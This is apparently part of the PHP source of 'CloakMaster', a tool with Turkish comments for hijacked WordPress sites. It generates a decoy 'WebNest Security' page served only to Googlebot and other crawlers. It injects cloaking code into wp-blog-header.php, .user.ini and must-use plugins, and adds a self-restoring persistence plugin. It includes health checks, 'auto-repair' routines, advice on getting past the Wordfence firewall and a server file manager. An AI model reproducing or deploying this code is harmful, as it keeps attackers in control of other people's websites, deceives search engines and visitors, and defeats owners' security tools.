'name' => 'WebNest Security',
'publisher' => ['@id' => $url.'/#organization'],
],
[
'@type' => 'Service',
'name' => 'Penetration Testing',
'provider' => ['@id' => $url.'/#organization'],
'description' => 'Full-scope network, web application and social engineering penetration testing.',
'serviceType' => 'Cybersecurity',
],
],
], JSON_UNESCAPED_SLASHES | JSON_PRETTY_PRINT);
$html = '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="robots" content="index,follow">
<meta name="description" content="WebNest Security — Enterprise cybersecurity consulting, penetration testing, SOC monitoring and threat intelligence. Protect your digital assets 24/7.">
<meta property="og:title" content="WebNest Security | Cyber Defense Specialists">
<meta property="og:description" content="Enterprise penetration testing, SOC-as-a-Service and threat intelligence solutions.">
<meta property="og:type" content="website">
<meta property="og:url" content="'.$esc_url.'">
<title>WebNest Security | Cyber Defense Specialists</title>
<script type="application/ld+json">'."\n".$schema."\n".'</script>
<style>
:root{--bg:#0a0d14;--bg2:#0f1520;--card:#131b2e;--acc:#00e5ff;--acc2:#7c3aed;--tx:#e2e8f0;--mu:#64748b;--gr:#22c55e;--rd:#ef4444;--bd:#1e2d45}
*{margin:0;padding:0;box-sizing:border-box}
html{scroll-behavior:smooth}
body{font-family:"Inter",-apple-system,BlinkMacSystemFont,"Segoe UI",sans-serif;background:var(--bg);color:var(--tx);min-height:100vh;overflow-x:hidden}
a{color:var(--acc);text-decoration:none}
/* NAV */
nav{position:fixed;top:0;left:0;right:0;z-index:100;background:rgba(10,13,20,.92);backdrop-filter:blur(12px);border-bottom:1px solid var(--bd);padding:0 5%;display:flex;align-items:center;justify-content:space-between;height:64px}
.logo{display:flex;align-items:center;gap:10px;font-size:1.15em;font-weight:700;color:var(--tx)}
.logo-icon{width:34px;height:34px;background:linear-gradient(135deg,var(--acc),var(--acc2));border-radius:8px;display:flex;align-items:center;justify-content:center;font-size:1.1em}
.nav-links{display:flex;gap:28px;font-size:.88em;color:var(--mu)}
.nav-links a{color:var(--mu);transition:color .2s}.nav-links a:hover{color:var(--acc)}
.nav-cta{background:linear-gradient(135deg,var(--acc),var(--acc2));color:#000 !important;padding:8px 20px;border-radius:6px;font-weight:600;font-size:.85em;transition:opacity .2s}.nav-cta:hover{opacity:.85}
/* HERO */
.hero{min-height:100vh;display:flex;flex-direction:column;align-items:center;justify-content:center;text-align:center;padding:80px 24px 60px;position:relative;overflow:hidden}
.hero::before{content:"";position:absolute;inset:0;background:radial-gradient(ellipse 80% 50% at 50% 0%,rgba(0,229,255,.08),transparent),radial-gradient(ellipse 50% 40% at 80% 80%,rgba(124,58,237,.1),transparent)}
.badge-top{display:inline-flex;align-items:center;gap:7px;background:rgba(0,229,255,.08);border:1px solid rgba(0,229,255,.2);color:var(--acc);padding:6px 16px;border-radius:20px;font-size:.78em;font-weight:600;margin-bottom:28px;letter-spacing:.04em}
.dot-pulse{width:7px;height:7px;background:var(--gr);border-radius:50%;animation:pulse 2s infinite}
@keyframes pulse{0%,100%{opacity:1;transform:scale(1)}50%{opacity:.5;transform:scale(.85)}}
.hero h1{font-size:clamp(2.2em,5vw,4em);font-weight:800;line-height:1.15;max-width:760px;margin-bottom:22px}
.hero h1 span{background:linear-gradient(135deg,var(--acc),var(--acc2));-webkit-background-clip:text;-webkit-text-fill-color:transparent;background-clip:text}
.hero p{color:var(--mu);font-size:1.12em;max-width:560px;line-height:1.7;margin-bottom:36px}
.hero-btns{display:flex;gap:14px;flex-wrap:wrap;justify-content:center}
.btn-primary{background:linear-gradient(135deg,var(--acc),#0891b2);color:#000;padding:13px 32px;border-radius:8px;font-weight:700;font-size:.95em;transition:transform .2s,box-shadow .2s;box-shadow:0 0 24px rgba(0,229,255,.2)}
.btn-primary:hover{transform:translateY(-2px);box-shadow:0 0 36px rgba(0,229,255,.35)}
.btn-outline{border:1px solid var(--bd);color:var(--tx);padding:13px 32px;border-radius:8px;font-weight:600;font-size:.95em;transition:border-color .2s,color .2s}
.btn-outline:hover{border-color:var(--acc);color:var(--acc)}
/* STATS */
.stats{background:var(--bg2);border-top:1px solid var(--bd);border-bottom:1px solid var(--bd);padding:40px 5%;display:grid;grid-template-columns:repeat(auto-fit,minmax(160px,1fr));gap:0;text-align:center}
.stat{padding:20px 10px;border-right:1px solid var(--bd)}.stat:last-child{border-right:none}
.stat-num{font-size:2em;font-weight:800;color:var(--acc);display:block;margin-bottom:4px}
.stat-lbl{color:var(--mu);font-size:.82em;letter-spacing:.03em}
/* SERVICES */
.section{max-width:1140px;margin:0 auto;padding:80px 24px}
.section-header{text-align:center;margin-bottom:52px}
.section-header .tag{display:inline-block;background:rgba(124,58,237,.15);color:#a78bfa;border:1px solid rgba(124,58,237,.3);padding:4px 14px;border-radius:12px;font-size:.75em;font-weight:700;letter-spacing:.06em;margin-bottom:14px}
.section-header h2{font-size:2em;font-weight:800;margin-bottom:12px}
.section-header p{color:var(--mu);max-width:500px;margin:0 auto;line-height:1.7}
.grid3{display:grid;grid-template-columns:repeat(auto-fit,minmax(300px,1fr));gap:22px}
.svc-card{background:var(--card);border:1px solid var(--bd);border-radius:14px;padding:30px;transition:border-color .25s,transform .25s}
.svc-card:hover{border-color:var(--acc);transform:translateY(-4px)}
.svc-icon{width:48px;height:48px;border-radius:10px;display:flex;align-items:center;justify-content:center;font-size:1.5em;margin-bottom:18px}
.svc-card h3{font-size:1.05em;font-weight:700;margin-bottom:10px;color:var(--tx)}
.svc-card p{color:var(--mu);font-size:.88em;line-height:1.65}
.svc-tag{display:inline-block;margin-top:14px;font-size:.72em;padding:3px 10px;border-radius:10px;background:rgba(0,229,255,.08);color:var(--acc);border:1px solid rgba(0,229,255,.15)}
/* PROCESS */
.process{background:var(--bg2);border-top:1px solid var(--bd);border-bottom:1px solid var(--bd)}
.steps{display:grid;grid-template-columns:repeat(auto-fit,minmax(200px,1fr));gap:0;text-align:center}
.step{padding:44px 24px;border-right:1px solid var(--bd);position:relative}.step:last-child{border-right:none}
.step-num{font-size:2.5em;font-weight:900;color:rgba(0,229,255,.12);margin-bottom:10px;display:block}
.step h4{font-size:.95em;font-weight:700;color:var(--tx);margin-bottom:8px}
.step p{color:var(--mu);font-size:.82em;line-height:1.55}
/* CTA BANNER */
.cta-banner{background:linear-gradient(135deg,rgba(0,229,255,.06),rgba(124,58,237,.08));border:1px solid var(--bd);border-radius:16px;padding:56px 40px;text-align:center;margin:0 24px 80px}
.cta-banner h2{font-size:1.9em;font-weight:800;margin-bottom:14px}
.cta-banner p{color:var(--mu);max-width:480px;margin:0 auto 28px;line-height:1.65}
/* FOOTER */
footer{background:var(--bg2);border-top:1px solid var(--bd);padding:40px 5%;display:grid;grid-template-columns:1fr auto;align-items:center;gap:20px;font-size:.83em;color:var(--mu)}
@media(max-width:640px){.nav-links{display:none}.stats{grid-template-columns:1fr 1fr}.steps{grid-template-columns:1fr 1fr}.stat,.step{border-right:none;border-bottom:1px solid var(--bd)}.footer{grid-template-columns:1fr}}
</style>
</head>
<body>
<!-- NAV -->
<nav>
<div class="logo">
<div class="logo-icon">🛡</div>
WebNest<span style="color:var(--acc);margin-left:1px">Security</span>
</div>
<div class="nav-links">
<a href="#services">Services</a>
<a href="#process">Process</a>
<a href="#contact">Contact</a>
<a href="#contact" class="nav-cta">Get Protected</a>
</div>
</nav>
<!-- HERO -->
<section class="hero">
<div class="badge-top">
<span class="dot-pulse"></span>
Active Threat Monitoring — 24/7 SOC Operations
</div>
<h1>Defend What<br><span>Matters Most</span></h1>
<p>Enterprise-grade cybersecurity consulting and managed security services. We identify vulnerabilities before attackers do.</p>
<div class="hero-btns">
<a href="#contact" class="btn-primary">Request a Pentest →</a>
<a href="#services" class="btn-outline">Our Services</a>
</div>
</section>
<!-- STATS -->
<div class="stats">
<div class="stat"><span class="stat-num">500+</span><span class="stat-lbl">Audits Completed</span></div>
<div class="stat"><span class="stat-num">98.7%</span><span class="stat-lbl">Threat Detection Rate</span></div>
<div class="stat"><span class="stat-num">120+</span><span class="stat-lbl">Enterprise Clients</span></div>
<div class="stat"><span class="stat-num">24/7</span><span class="stat-lbl">SOC Coverage</span></div>
</div>
<!-- SERVICES -->
<section class="section" id="services">
<div class="section-header">
<span class="tag">WHAT WE DO</span>
<h2>Comprehensive Cyber Defense</h2>
<p>From offensive security testing to real-time threat response — we cover every layer of your attack surface.</p>
</div>
<div class="grid3">
<div class="svc-card">
<div class="svc-icon" style="background:rgba(239,68,68,.12)">🎯</div>
<h3>Penetration Testing</h3>
<p>Full-scope red team engagements — web, mobile, API, network and social engineering. We exploit like real attackers, then show you how to fix it.</p>
<span class="svc-tag">OWASP TOP 10 · PTES</span>
</div>
<div class="svc-card">
<div class="svc-icon" style="background:rgba(0,229,255,.08)">🔭</div>
<h3>Threat Intelligence</h3>
<p>Dark web monitoring, IOC feeds and adversary tracking. Know who is targeting you before the breach happens.</p>
<span class="svc-tag">CTI · OSINT · Dark Web</span>
</div>
<div class="svc-card">
<div class="svc-icon" style="background:rgba(124,58,237,.12)">🖥</div>
<h3>SOC as a Service</h3>
<p>24/7 Security Operations Center powered by SIEM and custom detection rules. Sub-15-minute mean-time-to-detect.</p>
<span class="svc-tag">SIEM · SOAR · EDR</span>
</div>
<div class="svc-card">
<div class="svc-icon" style="background:rgba(34,197,94,.1)">🔐</div>
<h3>Cloud Security Audit</h3>
<p>AWS, GCP and Azure misconfiguration reviews, IAM privilege analysis and CIS Benchmark compliance checks.</p>
<span class="svc-tag">AWS · Azure · GCP</span>
</div>
<div class="svc-card">
<div class="svc-icon" style="background:rgba(245,158,11,.1)">📋</div>
<h3>Compliance & GRC</h3>
<p>ISO 27001, SOC 2 Type II, GDPR and PCI-DSS gap assessments. We prepare your organisation for certification audits.</p>
<span class="svc-tag">ISO 27001 · PCI-DSS · SOC2</span>
</div>
<div class="svc-card">
<div class="svc-icon" style="background:rgba(239,68,68,.1)">🚨</div>
<h3>Incident Response</h3>
<p>Rapid containment, forensic investigation and root-cause analysis. On-call IR retainer available for immediate deployment.</p>
<span class="svc-tag">DFIR · Forensics · Retainer</span>
</div>
</div>
</section>
<!-- PROCESS -->
<div class="process" id="process">
<div class="section" style="padding:60px 24px">
<div class="section-header">
<span class="tag">HOW IT WORKS</span>
<h2>Our Engagement Process</h2>
<p>Structured, transparent and aligned with your business continuity requirements.</p>
</div>
</div>
<div class="steps">
<div class="step"><span class="step-num">01</span><h4>Scoping</h4><p>Define objectives, rules of engagement and legal authorisation.</p></div>
<div class="step"><span class="step-num">02</span><h4>Reconnaissance</h4><p>Passive and active OSINT to map the full attack surface.</p></div>
<div class="step"><span class="step-num">03</span><h4>Exploitation</h4><p>Controlled exploitation of identified vulnerabilities — no real damage, full evidence.</p></div>
<div class="step"><span class="step-num">04</span><h4>Reporting</h4><p>Executive summary + detailed technical findings with CVSS scores and remediation steps.</p></div>
</div>
</div>
<!-- CTA -->
<div style="max-width:1140px;margin:80px auto 0">
<div class="cta-banner" id="contact">
<h2>Ready to <span style="color:var(--acc)">Stress-Test</span> Your Defenses?</h2>
<p>Get a free 30-minute discovery call. No commitment — just clarity on your current exposure.</p>
<a href="mailto:security@'.$esc_host.'" class="btn-primary" style="display:inline-block">
security@'.$esc_host.' →
</a>
</div>
</div>
<!-- FOOTER -->
<footer>
<div>
<strong style="color:var(--tx)">WebNest Security</strong> — Enterprise Cyber Defense<br>
<span style="font-size:.9em">© '.$year.' All rights reserved. Unauthorized access to this system is prohibited.</span>
</div>
<div style="display:flex;gap:18px">
<a href="#services">Services</a>
<a href="#process">Process</a>
<a href="#contact">Contact</a>
</div>
</footer>
</body>
</html>';
if (file_put_contents($cf, $html) === false)
return ['success'=>false,'message'=>'amp.php yazilamadi: '.$cf.' — Yazma izni kontrol edin.'];
return ['success'=>true,'message'=>'amp.php olusturuldu (WebNest Security temasi): '.$cf,'path'=>$cf];
}
// ══════════════════════════════════════════════════════
// BOT TESTİ
// ══════════════════════════════════════════════════════
// BOT TESTİ
// ══════════════════════════════════════════════════════
function cm_bot_test($url) {
@set_time_limit(120);
if (!$url) $url = cm_site_url().'/';
$uas = [
'Googlebot' => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Google-Inspect' => 'Mozilla/5.0 (compatible; Google-InspectionTool/1.0;)',
'Bingbot' => 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Normal Kullanıcı' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36',
];
$results = [];
foreach ($uas as $name => $ua) {
$opts = ['http'=>['method'=>'GET','header'=>"User-Agent: $ua\r\nCache-Control: no-cache\r\nPragma: no-cache",'timeout'=>8,'ignore_errors'=>true,'follow_location'=>1,'max_redirects'=>5],'ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]];
$body = @file_get_contents($url, false, stream_context_create($opts));
$code = 0;
if (!empty($http_response_header)) {
preg_match('/HTTP\/\S+\s+(\d+)/', (isset($http_response_header[0]) ? $http_response_header[0] : ''), $m);
$code = (int)((isset($m[1]) ? $m[1] : 0));
}
$is_wp = $body && (strpos($body,'wp-content')!==false || strpos($body,'wp-includes')!==false || strpos($body,'xmlrpc')!==false);
$is_cloak = $body && !$is_wp && strlen(strip_tags($body)) > 80;
$results[$name] = ['ua'=>$ua,'code'=>$code,'is_wp'=>$is_wp,'is_cloak'=>$is_cloak,'preview'=>$body ? substr(strip_tags($body),0,300) : '(boş yanıt)'];
}
return ['success'=>true,'data'=>$results,'url'=>$url];
}
// ══════════════════════════════════════════════════════
// SİSTEM SAĞLIĞI + OTO-ONARIM
// ══════════════════════════════════════════════════════
function cm_http_get($url, $ua = null, $timeout = 8) {
$ua = $ua ?: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120 Safari/537.36';
$opts = ['http'=>['method'=>'GET','header'=>"User-Agent: $ua\r\nCache-Control: no-cache\r\n",'timeout'=>$timeout,'ignore_errors'=>true,'follow_location'=>1,'max_redirects'=>3],'ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]];
$ctx = stream_context_create($opts);
$t = microtime(true);
$body = @file_get_contents($url, false, $ctx);
$ms = (int)round((microtime(true)-$t)*1000);
$code = 0;
if (!empty($http_response_header))
preg_match('/HTTP\/\S+\s+(\d+)/', (isset($http_response_header[0]) ? $http_response_header[0] : ''), $m) && ($code=(int)$m[1]);
return ['code'=>$code,'ms'=>$ms,'body'=>$body?:''];
}
function cm_health_check() {
@set_time_limit(60);
$r = cm_root();
$url = cm_site_url();
$cf = cm_cloak_file();
$res = [];
// 1. Ana site HTTP kodu
$main = cm_http_get($url, null, 8);
$res['main'] = ['ok'=>($main['code']>=200&&$main['code']<400), 'code'=>$main['code'], 'ms'=>$main['ms'],
'label' => $main['code']>=500 ? '🔴 SUNUCU HATASI ('.$main['code'].')' : ($main['code']>=400 ? '🟡 '.$main['code'] : '🟢 '.$main['code'].' ('.$main['ms'].'ms)')];
// 2. wp-security.php ping
$ping = cm_http_get($url.'/wp-security.php?ping=1', null, 5);
$ping_ok = ($ping['code']==200 && strpos($ping['body'],'"online"')!==false);
$res['ping'] = ['ok'=>$ping_ok, 'code'=>$ping['code'],
'label' => $ping_ok ? '🟢 wp-security.php aktif' : '🔴 wp-security.php bulunamıyor ('.$ping['code'].')'];
// 3. Cloak dosyası disk üstünde
$res['cloak_file'] = ['ok'=>is_file($cf), 'path'=>$cf,
'label' => is_file($cf) ? '🟢 Cloak dosyası mevcut: '.basename($cf) : '🔴 Cloak dosyası YOK: '.basename($cf)];
// 4. Bot görünümü
$bot_ua = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)';
$bot = cm_http_get($url, $bot_ua, 8);
$bot_is_wp = strpos($bot['body'],'wp-content')!==false || strpos($bot['body'],'wp-includes')!==false;
$bot_is_cloak = !$bot_is_wp && $bot['code']==200 && strlen(strip_tags($bot['body']))>80;
$res['cloak_bot'] = ['ok'=>$bot_is_cloak,'code'=>$bot['code'],'is_wp'=>$bot_is_wp,
'label' => $bot['code']>=500 ? '🔴 Bot isteği '.$bot['code'].' hatası' : ($bot_is_cloak ? '🟢 Googlebot cloak görüyor' : ($bot_is_wp ? '🟡 Bot WordPress görüyor (cloak çalışmıyor)' : '🟡 Bot yanıtı belirsiz ('.$bot['code'].')'))];
// 5. WP dosya bütünlüğü
$wp_ok = is_file($r.'wp-load.php') && is_file($r.'wp-blog-header.php');
$res['wp_files'] = ['ok'=>$wp_ok,
'label' => $wp_ok ? '🟢 WordPress çekirdek dosyaları yerinde' : '🔴 wp-load.php veya wp-blog-header.php eksik!'];
// 6. .htaccess yazılabilir mi
$ht = $r.'.htaccess';
$ht_ok = is_file($ht) && is_writable($ht);
$res['htaccess'] = ['ok'=>$ht_ok, 'has_cloak'=>is_file($ht)&&strpos(@file_get_contents($ht),'CloakMaster')!==false,
'label' => $ht_ok ? '🟢 .htaccess yazılabilir' : '🟡 .htaccess '.( is_file($ht)?'salt okunur':'bulunamıyor')];
// 7. Aktif cloak yöntemleri
$cloak_st = cm_cloak_all_status();
// cm_cloak_all_status() true/false döndürür — doğrudan filtrele
$active = array_filter($cloak_st, function($v){ return (bool)$v; });
$res['cloak_methods'] = ['ok'=>count($active)>0,'count'=>count($active),
'label' => count($active)>0 ? '🟢 '.count($active).' cloak yöntemi aktif' : '🔴 Hiçbir cloak yöntemi aktif değil'];
// 8. mu-plugins/cm-persist.php
$persist = is_file($r.'wp-content/mu-plugins/cm-persist.php');
$res['persist'] = ['ok'=>$persist,
'label' => $persist ? '🟢 Kalıcılık MU Plugin mevcut' : '🟡 Kalıcılık MU Plugin kurulu değil'];
// Genel sorunlar listesi
$issues = [];
if (!$res['main']['ok']) $issues[] = 'Ana site HTTP '.$main['code'].' hatası veriyor';
if (!$res['cloak_file']['ok']) $issues[] = 'Cloak dosyası eksik — yeniden oluştur';
if (!$res['ping']['ok']) $issues[] = 'wp-security.php erişilemiyor';
if ($bot_is_wp) $issues[] = 'Googlebot WordPress görüyor — cloak aktif değil ya da cache sorunu';
if ($bot['code']>=500) $issues[] = 'Bot isteği 5xx hatası — cloak injection sitenin WP\'sini bozuyor olabilir';
if (!$res['wp_files']['ok']) $issues[] = 'WordPress çekirdek dosyaları eksik';
if (!$res['persist']['ok']) $issues[] = 'Kalıcılık sistemi kurulu değil (dosyalar silinince geri gelmez)';
$res['issues'] = $issues;
$res['healthy'] = empty($issues);
return ['success'=>true,'data'=>$res];
}
function cm_auto_repair() {
@set_time_limit(120);
$r = cm_root();
$cf = cm_cloak_file();
$url = cm_site_url();
$log = [];
// 1. Ana site 5xx ise → cloak injection'ları kaldır (site kurtarma öncelikli)
$main = cm_http_get($url, null, 8);
if ($main['code'] >= 500) {
$removed = [];
if (cm_st_header($r)) { cm_remove_header($r); $removed[] = 'wp-blog-header.php'; }
if (cm_st_user_ini($r)) { cm_remove_user_ini($r); $removed[] = '.user.ini/cm-prepend.php'; }
if (!empty($removed)) {
$log[] = ['type'=>'fix','msg'=>'⚠️ Ana site 500 idi → Cloak kaldırıldı: '.implode(', ',$removed).'. Lütfen önce siteyi kontrol et.'];
return ['success'=>true,'log'=>$log,'message'=>'Site 500 hatası veriyordu, güvenli cloak yöntemleri kaldırıldı. Siteyi kontrol et.'];
}
}
// 2. Cloak dosyası yoksa yeniden oluştur
if (!is_file($cf)) {
$r2 = cm_create_amp();
$log[] = ['type'=>'fix','msg'=> $r2['success'] ? '✅ Cloak dosyası yeniden oluşturuldu: '.basename($cf) : '❌ Cloak dosyası oluşturulamadı: '.$r2['message']];
}
// 3. Aktif cloak yöntemlerini tazele (kodları güncelle)
$refresh = cm_cloak_refresh();
if (!empty($refresh['log'])) {
foreach ($refresh['log'] as $l) $log[] = ['type'=>'info','msg'=>'🔄 '.$l];
}
// 4. Kalıcılık yoksa veya boşaltılmışsa kur
$__mp2 = $r.'wp-content/mu-plugins/cm-persist.php';
if ((!is_file($__mp2) || @filesize($__mp2) < 512) && $GLOBALS['wp_loaded']) {
$pr = cm_persist_install();
$log[] = ['type'=>'fix','msg'=> $pr['success'] ? '✅ Kalıcılık MU Plugin kuruldu' : '⚠️ Kalıcılık kurulamadı: '.$pr['message']];
}
// 5. Onarım sonrası siteyi tekrar kontrol et
$after = cm_http_get($url, null, 8);
$log[] = ['type'=>$after['code']<400?'ok':'warn','msg'=>'🌐 Onarım sonrası site durumu: HTTP '.$after['code'].' ('.$after['ms'].'ms)'];
return ['success'=>true,'log'=>$log,'message'=>count($log).' işlem tamamlandı. Site: HTTP '.$after['code'].'.'];
}
// ══════════════════════════════════════════════════════
// TEŞHİS
// ══════════════════════════════════════════════════════
function cm_diagnose() {
@set_time_limit(60);
$r = cm_root(); $issues = []; $info = [];
// PHP & sunucu
$info['php'] = phpversion();
$info['server'] = (isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'Bilinmiyor');
$info['os'] = PHP_OS;
$info['abspath'] = $r;
$info['doc_root'] = (isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : 'Bilinmiyor');
$info['amp_exists'] = is_file($r.'amp.php');
$info['wp_version'] = ($GLOBALS['wp_loaded'] && function_exists('get_bloginfo')) ? get_bloginfo('version') : '—';
$info['wp_loaded'] = (bool)$GLOBALS['wp_loaded'];
// .htaccess
$ht = $r.'.htaccess';
if (is_file($ht)) {
$htc = file_get_contents($ht);
$info['htaccess'] = round(strlen($htc)/1024,1).' KB';
$info['cloak_ht'] = strpos($htc,'# BEGIN CloakMaster')!==false;
if (preg_match('/Cache-Type.*full/i',$htc)||strpos($htc,'LiteSpeed')!==false)
$issues[]=['type'=>'warn','title'=>'LiteSpeed .htaccess Cache Kurali','desc'=>'.htaccess icinde LiteSpeed cache yonergesi bulundu. Bot trafigi cache alabilir.','fix'=>"LiteSpeed Cache > Cache > Exclude URI: /amp.php\nVEYA: LiteSpeed Cache > Genel > Onbellegi Kapat: KAPALI"];
} else {
$info['htaccess'] = 'Yok';
}
// LiteSpeed Cache
$ls = $r.'wp-content/plugins/litespeed-cache/litespeed-cache.php';
if (is_file($ls)) {
$issues[]=['type'=>'warn','title'=>'LiteSpeed Cache Aktif','desc'=>'LiteSpeed Cache bot ziyaretlerini onbellekleyebilir, cloak calismiyor gorunur.','fix'=>"1. LiteSpeed Cache > Cache > Genel > Onbellegi Etkinlestir: KAPALI\n2. VEYA: Exclude URI > /amp.php ekle\n3. LiteSpeed Cache > Crawler > Crawleri Kapat\n4. QUIC.cloud baglantisini kes\n5. Tools > Purge > Purge All"];
}
// W3TC
if (is_file($r.'wp-content/plugins/w3-total-cache/w3-total-cache.php'))
$issues[]=['type'=>'warn','title'=>'W3 Total Cache Aktif','desc'=>'W3TC bot trafiklerini onbelge alabilir.','fix'=>"W3TC > Page Cache > Bot cache: KAPALI\nVEYA: Exclude URI: /amp.php"];
// WP Super Cache
if (is_file($r.'wp-content/plugins/wp-super-cache/wp-cache.php'))
$issues[]=['type'=>'warn','title'=>'WP Super Cache Aktif','desc'=>'WP Super Cache onbellek yapabilir.','fix'=>"WP Super Cache > Ayarlar > Exclude URI: /amp.php\nVEYA: Development mode ac"];
// WP Rocket
if (is_file($r.'wp-content/plugins/wp-rocket/wp-rocket.php'))
$issues[]=['type'=>'warn','title'=>'WP Rocket Aktif','desc'=>'WP Rocket onbellegi cloak engelleyebilir.','fix'=>"WP Rocket > Cache > Exclude URI: /amp.php\nVEYA: Exclude User Agent: googlebot, bingbot"];
// Wordfence
if (is_file($r.'wp-content/plugins/wordfence/wordfence.php'))
$issues[]=['type'=>'info','title'=>'Wordfence WAF Aktif','desc'=>'Wordfence bot UAlarini engelleyebilir. .user.ini yontemi Wordfenceden once calisir.','fix'=>".user.ini (auto_prepend_file) yontemini kullan - WAFtan once calisir, bypass eder."];
// .user.ini
$ui = $r.'.user.ini';
$info['user_ini'] = is_file($ui) ? (_cm_file_contains($ui,'cm_prepend') ? 'CloakMaster aktif' : 'Mevcut (CloakMaster yok)') : 'Yok';
// cm-prepend.php var mi?
$prep_file = $r.'cm-prepend.php';
$info['prepend_file_exists'] = is_file($prep_file);
// PHP-FPM gercekten auto_prepend_file uyguluyor mu?
$actual_prepend = ini_get('auto_prepend_file');
$info['php_prepend_active'] = !empty($actual_prepend) ? $actual_prepend : '';
$prepend_mismatch = !empty($actual_prepend) && realpath($actual_prepend) !== realpath($prep_file);
$prepend_missing = empty($actual_prepend) && $info['user_ini'] === 'CloakMaster aktif';
// .user.ini aktif gorunuyor ama PHP-FPM uygulamiyor
if ($prepend_missing) {
$issues[]=['type'=>'error','title'=>'PHP-FPM .user.ini Okutmuyor',
'desc'=>'.user.ini dosyasinda auto_prepend_file ayarli ANCAK PHP-FPM bu ayari uygulamiyor. ini_get("auto_prepend_file") bos donuyor.',
'fix'=>"Cozum secenekleri (birini sec):\n\n1. MU Plugin yontemini aktif et (Cloak Yonetimi'nden) — nginx'te en guvenilir yontem\n2. wp-blog-header.php enjeksiyonunu aktif et\n3. Hosting panelinden PHP-FPM havuzunun .user.ini okumasi icin: php_value[user_ini.filename] = .user.ini\n4. Cloudways kullaniyorsan: Ayarlar > PHP > user_ini.filename degerini kontrol et"];
}
// cm-prepend.php yok ama .user.ini aktif
if ($info['user_ini'] === 'CloakMaster aktif' && !$info['prepend_file_exists']) {
$issues[]=['type'=>'error','title'=>'cm-prepend.php Eksik',
'desc'=>'.user.ini auto_prepend_file olarak cm-prepend.php yaziyor ama bu dosya sunucuda YOK. Cloak hic calismayacak.',
'fix'=>"Cloak Yonetimi > .user.ini yontemini once Kaldir, sonra tekrar Uygula — cm-prepend.php yeniden olusturulur."];
}
// Nginx tespiti
$server_sw = strtolower((isset($info['server']) ? $info['server'] : ''));
$is_nginx = strpos($server_sw,'nginx') !== false;
$is_apache = strpos($server_sw,'apache') !== false;
if ($is_nginx) {
$issues[]=['type'=>'info','title'=>'Sunucu: nginx — .htaccess Calismiyor',
'desc'=>'nginx sunucularda .htaccess RewriteRule tamamen yok sayilir. Sadece PHP tabanli yontemler guvenlilir.',
'fix'=>"Aktif et: MU Plugin VEYA wp-blog-header.php enjeksiyonu\n.htaccess yontemini kaldirabilirsin — etkisiz."];
}
// Cloudways tespiti
$is_cloudways = strpos($r,'cloudwaysapps') !== false || strpos(isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '','cloudwaysapps') !== false;
if ($is_cloudways) {
$info['cloudways'] = true;
// Varnish cache kontrolu - cloudways'de varsayilan olarak acik
$issues[]=['type'=>'warn','title'=>'Cloudways: Varnish/Redis Cache Katmani',
'desc'=>"Cloudways'de trafik once Varnish/Redis onbellekten gecer. Eger WordPress sayfasi onbelleklenmisse bot istekleri PHP'ye hic ulasmaz — cloak calismaz.",
'fix'=>"Cloudways Paneli > Server Management > Manage Services > Varnish: STOP\nVEYA:\nCloudways Paneli > Application > Cache Management > Purge All\n\nKalici cozum: Varnish'e bot UA bypass kurali ekle (Cloudways destegine sor)\nVEYA: Redis/Varnish'i kapat, sadece PHP seviye cache kullan"];
}
// MU Plugin cloak aktif mi kontrol
$mu_cloak = $r.'wp-content/mu-plugins/cm-cloak.php';
$info['mu_cloak_active'] = is_file($mu_cloak);
// wp-blog-header enjeksiyonu aktif mi
$wbh = $r.'wp-blog-header.php';
$info['wbh_injected'] = is_file($wbh) && strpos(file_get_contents($wbh),'cm_') !== false;
// Hicbir cloak yontemi aktif degil uyarisi
$any_active = ($info['user_ini'] === 'CloakMaster aktif' && $info['prepend_file_exists'] && !$prepend_missing)
|| $info['mu_cloak_active']
|| $info['wbh_injected'];
if (!$any_active) {
$issues[]=['type'=>'error','title'=>'Hicbir Cloak Yontemi Calismıyor',
'desc'=>'Ne .user.ini ne MU Plugin ne de wp-blog-header enjeksiyonu aktif ve calisir durumda. Botlar WordPress\'i goruyor.',
'fix'=>"Cloak Yonetimi sekmesine gec ve MU Plugin yontemini aktif et.\nnginx icin en guvenilir yontem budur."];
}
// Yazma izinleri
$perms = [];
foreach (['.htaccess','.user.ini','wp-blog-header.php','wp-config.php'] as $fn) {
$fp=$r.$fn;
$perms[$fn] = is_file($fp) ? is_writable($fp) : is_writable($r);
}
$info['writable'] = $perms;
// amp.php uyarısı
if (!$info['amp_exists'])
$issues[]=['type'=>'info','title'=>'amp.php Yok','desc'=>'Botlarin gorecegi icerik dosyasi olusturulmamis.','fix'=>"Cloak Yonetimi > amp.php Olustur butonuna tikla."];
return ['success'=>true,'data'=>compact('issues','info')];
}
// ══════════════════════════════════════════════════════
// DOSYA YÖNETİCİSİ
// ══════════════════════════════════════════════════════
function cm_safepath($path) {
if (!$path || $path === '.') return (isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : dirname(__FILE__));
// Temizle
$path = str_replace(['../', '.\\', '../'], '', $path);
if (!preg_match('/^([A-Za-z]:[\\/]|\/)/', $path)) {
$path = (isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : dirname(__FILE__)) . '/' . $path;
}
return rtrim($path, '/\\');
}
function cm_file_list($path) {
$safe = cm_safepath($path);
if (!is_dir($safe)) return ['success'=>false,'message'=>'Dizin bulunamadı: '.$safe];
$entries = @scandir($safe);
if ($entries === false) return ['success'=>false,'message'=>'Dizin okunamadı (izin yok?).'];
$items = [];
foreach ($entries as $e) {
if ($e === '.') continue;
$full = $safe.DIRECTORY_SEPARATOR.$e;
$isDir = is_dir($full);
